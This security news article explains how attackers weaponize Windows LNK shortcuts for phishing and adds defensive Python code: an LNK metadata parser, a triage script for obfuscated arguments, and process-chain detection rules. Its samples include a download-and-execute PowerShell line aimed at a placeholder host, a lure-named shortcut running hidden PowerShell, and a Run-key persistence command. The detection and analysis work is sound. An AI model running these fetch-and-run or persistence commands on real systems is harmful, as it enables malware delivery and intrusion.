
Hackers Weaponizing Windows Shortcut Files for Phishing

LNK files, a shortcut file type in Windows OS, provide easy access to programs, folders, or websites.

Whether Windows creates the shortcut (for example during an application install) or a user does, the LNK file stores the target location together with metadata that is useful for threat intelligence.

That metadata includes the NetBIOS name of the machine on which the shortcut was built, the volume label and the serial number of the drive it was built on. Explorer also suppresses the .lnk extension even when extensions are otherwise shown (the file type is registered with NeverShowExt), so a user cannot tell a shortcut from the file it imitates without opening its properties or querying it from the command line.

Attackers abuse LNK files to slip past detection and deliver malware such as Qakbot, Rhadamanthys, Remcos and Amadey; the shortcuts are disguised as legitimate files (executables or PDFs) so that users click them.

Rhadamanthys LNK Phishing Campaign

A single click compromises the user's system and, from there, the network. By analysing active LNK phishing campaigns defenders learn attacker tradecraft, and tools such as LECmd extract the shortcut's contents (target, arguments, volume and machine metadata) so the attack can be understood in detail.
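The fields mentioned above (target path, arguments, volume label, drive serial number, creating machine) live in fixed structures defined by MS-SHLLINK, and reading them needs no Windows API. The following is an added example, not code from the article or from Splunk: a small builder assembles a minimal but valid .lnk with exactly those fields, and a parser reads them back, which is the same job LECmd does at scale. The builder lets the example run offline on a constructed sample; the target path, arguments, volume label, serial number, machine name and MAC address below are all made-up values.

```python
import struct
import uuid

# Constants from MS-SHLLINK; only the fields needed for triage are modelled.
LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
TRACKER_SIG = 0xA0000003
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                 (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location"))


def build_lnk(local_path, arguments, volume_label, drive_serial, machine_id, mac):
    """Assemble a minimal .lnk: ShellLinkHeader, LinkInfo (VolumeID + LocalBasePath),
    COMMAND_LINE_ARGUMENTS and a TrackerDataBlock. No LinkTargetIDList is emitted."""
    flags = HAS_LINK_INFO | HAS_ARGS | IS_UNICODE
    # HeaderSize, CLSID, LinkFlags, FileAttributes(ARCHIVE), 3 FILETIMEs, FileSize,
    # IconIndex, ShowCommand (1 = SW_SHOWNORMAL), HotKey, Reserved1..3
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LNK_CLSID.bytes_le, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    label = volume_label.encode("ascii") + b"\0"
    # VolumeID: size, DriveType (3 = DRIVE_FIXED), serial, VolumeLabelOffset, label
    volume = struct.pack("<IIII", 16 + len(label), 3, drive_serial, 16) + label
    base = local_path.encode("ascii") + b"\0"
    vol_off = 0x1C                        # LinkInfoHeaderSize without Unicode offsets
    base_off = vol_off + len(volume)
    suffix_off = base_off + len(base)     # CommonPathSuffix is the empty string
    link_info = struct.pack("<7I", suffix_off + 1, 0x1C, 0x1, vol_off, base_off, 0,
                            suffix_off) + volume + base + b"\0"
    args = struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")
    # TrackerDataBlock: 16-byte NetBIOS name, then two (volume, file) GUID pairs.
    # The file object-ID is a version-1 UUID, so it embeds the creating host's MAC.
    droid = uuid.UUID(int=0).bytes_le + uuid.uuid1(node=mac).bytes_le
    tracker = (struct.pack("<IIII", 0x60, TRACKER_SIG, 0x58, 0)
               + machine_id.encode("ascii").ljust(16, b"\0")[:16] + droid + droid)
    return header + link_info + args + tracker + struct.pack("<I", 0)  # terminal block


def _cstr(data, off):
    """Read a NUL-terminated ANSI string starting at off."""
    return data[off:data.index(b"\0", off)].decode("latin-1")


def parse_lnk(data):
    """Extract the forensic fields: target path, arguments, volume label and serial,
    plus the NetBIOS name and MAC address of the machine the shortcut was made on."""
    size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if size != 0x4C or uuid.UUID(bytes_le=clsid) != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    info = {"flags": flags, "show_command": struct.unpack_from("<I", data, 60)[0]}
    pos = 0x4C
    if flags & HAS_ID_LIST:                       # skip the IDList; strings follow it
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:
        li_size, _, li_flags, vol_off, base_off, _, _ = struct.unpack_from("<7I", data, pos)
        if li_flags & 0x1:                        # VolumeIDAndLocalBasePath present
            v = pos + vol_off
            _, drive_type, serial, label_off = struct.unpack_from("<IIII", data, v)
            info.update(drive_type=drive_type, drive_serial=f"{serial:08X}",
                        volume_label=_cstr(data, v + label_off),
                        local_base_path=_cstr(data, pos + base_off))
        pos += li_size
    for flag, key in STRING_FIELDS:               # StringData, in the order the spec fixes
        if flags & flag:
            n = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            width = 2 if flags & IS_UNICODE else 1
            info[key] = data[pos:pos + n * width].decode("utf-16-le" if width == 2 else "latin-1")
            pos += n * width
    while pos + 4 <= len(data):                   # ExtraData blocks end at a size < 4
        block_size = struct.unpack_from("<I", data, pos)[0]
        if block_size < 4:
            break
        if struct.unpack_from("<I", data, pos + 4)[0] == TRACKER_SIG:
            info["machine_id"] = data[pos + 16:pos + 32].split(b"\0")[0].decode("ascii", "replace")
            file_id = uuid.UUID(bytes_le=data[pos + 48:pos + 64])
            if file_id.version == 1:
                info["mac"] = ":".join(f"{(file_id.node >> s) & 0xFF:02x}" for s in range(40, -1, -8))
        pos += block_size
    return info


if __name__ == "__main__":
    # Constructed sample: a shortcut that launches PowerShell, as a phishing LNK would.
    blob = build_lnk(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                     "-w hidden -nop -c \"...\"", "OS", 0x1234ABCD, "DESKTOP-TEST", 0x001122334455)
    for key, value in parse_lnk(blob).items():
        print(f"{key:16} {value}")
```

The same parser works on a real shortcut read with `open(path, "rb").read()`; the MAC in the tracker block and the NetBIOS name are the two fields most often pivoted on when clustering LNKs from one builder, and a zeroed tracker block or a serial/label that does not match the lure's supposed origin is itself a triage signal.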


Threat actors use LNK files in phishing campaigns both to deploy malware and to carry out reconnaissance, by embedding commands or scripts in the shortcut's target and argument fields.

When the user opens the shortcut, those commands run and can download malware, steal data or collect system information.

LNK Recon

Examples include shortcuts that download AsyncRAT or the Rhadamanthys trojan, command lines obfuscated with cmd.exe caret (^) escape characters that cmd strips before execution, and LNKs crafted to look like legitimate files such as PDFs, which raises the chance that a user clicks them.
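Once the arguments field has been pulled out of a shortcut, the three tricks just described (document-looking name, caret obfuscation, a hidden PowerShell with an encoded command) can be checked mechanically. The block below is an added example and not the article's or Splunk's code: it normalises a cmd.exe command line by removing carets, decodes a `-EncodedCommand` payload (UTF-16LE inside base64), and returns the indicators it found. The file name and command line it runs on are constructed for the example; the hostname `example.test` in the decoded payload is a placeholder.

```python
import base64
import re

# Binaries a shortcut's target or arguments should rarely name in user-facing documents.
LOLBINS = ("powershell", "pwsh", "cmd", "mshta", "wscript", "cscript", "rundll32",
           "regsvr32", "forfiles", "certutil", "bitsadmin", "msiexec", "expand")
DOC_EXT = r"\.(?:pdf|docx?|xlsx?|pptx?|txt|jpe?g|png)"
# Base64 alphabet is [A-Za-z0-9+/=]; the lookarounds stop a LOLBIN name that happens to
# appear inside an encoded blob from counting as a hit.
LOLBIN_RE = re.compile(r"(?i)(?<![\w+/=])(" + "|".join(LOLBINS) + r")(?:\.exe)?(?![\w+/=])")


def strip_carets(cmdline):
    """cmd.exe discards ^ and keeps the following character, so 'p^o^w' runs 'pow'
    and '^^' is a literal caret. Carets inside double quotes are literal in cmd;
    this normaliser ignores that case, which is fine for triage, not for emulation."""
    return re.sub(r"\^(.)", r"\1", cmdline)


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand payload, if one is present.
    PowerShell accepts any unambiguous prefix of the switch: -e, -ec, -en, -enc, ..."""
    m = re.search(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(filename, cmdline):
    """Score one shortcut from its file name and COMMAND_LINE_ARGUMENTS field."""
    indicators = []
    if re.search(DOC_EXT + r"\.lnk$", filename, re.I):
        indicators.append("double-extension lure")
    norm = strip_carets(cmdline)
    if norm != cmdline:
        indicators.append("caret obfuscation")
    hits = sorted({h.lower() for h in LOLBIN_RE.findall(norm)})
    if hits:
        indicators.append("lolbin: " + ",".join(hits))
    if re.search(r"(?i)-w(?:indowstyle)?\s+hidden\b|-nop(?:rofile)?\b|-noni(?:nteractive)?\b", norm):
        indicators.append("hidden/non-interactive powershell")
    decoded = decode_encoded_command(norm)
    if decoded:
        indicators.append("encoded command")
        if re.search(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression", decoded):
            indicators.append("downloader in decoded payload")
    return {"normalized": norm, "decoded": decoded, "indicators": indicators}


# Constructed samples (not from any real campaign): the arguments a cmd.exe-targeting
# shortcut would carry, plus a harmless shortcut for contrast.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/stage2')"
ENC = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLES = {
    "Invoice_2024.pdf.lnk": "/c p^o^w^e^r^s^h^e^l^l -w hidden -nop -enc " + ENC,
    "Notepad.lnk": "",     # an ordinary shortcut usually carries no arguments at all
}

if __name__ == "__main__":
    for name, args in SAMPLES.items():
        result = triage(name, args)
        print(name, "->", result["indicators"] or "clean")
        if result["decoded"]:
            print("   decoded:", result["decoded"])
```

The normalised command line is what should be written to the case notes and fed to detection content; matching on the raw, caret-laden string is exactly what the obfuscation is designed to defeat.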

In one observed chain, the malicious LNK launches PowerShell through a living-off-the-land binary (LOLBIN). The obfuscated PowerShell commands decrypt data embedded in the LNK itself and write out a decoy DOCX alongside a malicious CAB archive.

LNK Obfuscated PowerShell

The PowerShell script then calls expand.exe to extract the CAB, which contains a VBScript, several batch files and a legitimate unzip.exe utility.

The VBScript uses a COM object to run a batch file that establishes persistence through a registry modification and launches further batch files, which download additional payloads, collect system information and communicate with the C2 servers.
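The chain above is visible in process-creation and registry telemetry as a parent-child pattern: a script host under Explorer, expand.exe unpacking a CAB beneath it, and a Run-key write from a descendant of the script host. The following is an added example, not the article's or Splunk's detection content: it runs three such rules over a constructed, Sysmon-style event list (EventID 1 process create, EventID 13 registry value set). The events, PIDs, paths and the `Updater` value name are all made up for the example; a real installer expanding a CAB and Explorer opening Word are included as benign noise to show what does not fire.

```python
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
RUN_KEY = "\\software\\microsoft\\windows\\currentversion\\run"   # also matches RunOnce

# Constructed Sysmon-style events modelled on the chain described above; not real telemetry.
EVENTS = [
    {"id": 1, "pid": 100, "ppid": 1, "image": "C:\\Windows\\explorer.exe", "cmd": "explorer.exe"},
    {"id": 1, "pid": 200, "ppid": 100, "image": "C:\\Windows\\System32\\cmd.exe",
     "cmd": "cmd.exe /c powershell -w hidden -nop -c ..."},
    {"id": 1, "pid": 210, "ppid": 200,
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmd": "powershell -w hidden -nop -c ..."},
    {"id": 1, "pid": 300, "ppid": 210, "image": "C:\\Windows\\System32\\expand.exe",
     "cmd": "expand.exe C:\\Users\\u\\AppData\\Local\\Temp\\pkg.cab -F:* C:\\Users\\u\\AppData\\Local\\Temp\\pkg"},
    {"id": 1, "pid": 400, "ppid": 210, "image": "C:\\Windows\\System32\\wscript.exe",
     "cmd": "wscript.exe C:\\Users\\u\\AppData\\Local\\Temp\\pkg\\run.vbs"},
    {"id": 1, "pid": 500, "ppid": 400, "image": "C:\\Windows\\System32\\cmd.exe",
     "cmd": "cmd.exe /c C:\\Users\\u\\AppData\\Local\\Temp\\pkg\\persist.bat"},
    {"id": 1, "pid": 600, "ppid": 500, "image": "C:\\Windows\\System32\\reg.exe",
     "cmd": "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Updater /t REG_SZ /d ..."},
    {"id": 13, "pid": 600, "image": "C:\\Windows\\System32\\reg.exe",
     "target": "HKU\\S-1-5-21-1-2-3-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater"},
    # Benign noise: an installer expanding a CAB, and Explorer opening Word.
    {"id": 1, "pid": 700, "ppid": 1, "image": "C:\\Windows\\System32\\msiexec.exe", "cmd": "msiexec /i setup.msi"},
    {"id": 1, "pid": 710, "ppid": 700, "image": "C:\\Windows\\System32\\expand.exe",
     "cmd": "expand.exe files.cab -F:* C:\\Program Files\\App"},
    {"id": 1, "pid": 800, "ppid": 100, "image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "cmd": "WINWORD.EXE letter.docx"},
]


def _base(image):
    """Lower-cased file name of an image path."""
    return image.rsplit("\\", 1)[-1].lower()


def ancestry(procs, pid):
    """Image names of pid and its ancestors, child first, following ParentProcessId."""
    chain = []
    while pid in procs:
        chain.append(_base(procs[pid]["image"]))
        pid = procs[pid]["ppid"]
    return chain


def detect(events):
    """Return (rule, pid) alerts for the LNK -> script host -> CAB -> persistence pattern."""
    procs = {e["pid"]: e for e in events if e["id"] == 1}
    alerts = []
    for e in events:
        if e["id"] == 1:
            chain = ancestry(procs, e["pid"])
            me, parents = chain[0], chain[1:]
            # Rule 1: Explorer directly spawning a script host is how a double-clicked LNK looks.
            if me in SCRIPT_HOSTS and parents[:1] == ["explorer.exe"]:
                alerts.append(("script host spawned by Explorer (possible LNK launch)", e["pid"]))
            # Rule 2: expand.exe unpacking a CAB anywhere below a script host.
            if me == "expand.exe" and ".cab" in e["cmd"].lower() and SCRIPT_HOSTS & set(parents):
                alerts.append(("expand.exe unpacking a CAB under a script host", e["pid"]))
        elif e["id"] == 13:
            # Rule 3: Run-key value written by a process whose ancestors include a script host.
            if RUN_KEY in e["target"].lower() and SCRIPT_HOSTS & set(ancestry(procs, e["pid"])[1:]):
                alerts.append(("Run-key persistence written from a script-host chain", e["pid"]))
    return alerts


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"pid {pid}: {rule}")
```

Rule 1 is noisy on its own (administrators open cmd.exe from Explorer), which is why the other two rules key on what happens beneath the script host; in production the three would be chained or scored rather than alerted individually.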

LNK Attack Chain

Splunk's research describes three ways to simulate LNK phishing in order to test an organisation's defences. The first uses Atomic Red Team's Invoke-AtomicTest to write an LNK into the Startup folder that launches a command prompt at user logon.

The second uses LNK Generator, which simplifies creating desktop shortcuts with various functionality, for example a CMD shortcut or a PowerShell shortcut that downloads and executes an MSI package.

The third uses Atomic Red Team tests to simulate a malicious LNK with an embedded CAB file. Examining real-world malicious LNK files in the same way gives security analysts the insight needed to develop and test detection capabilities.


Aman Mishra
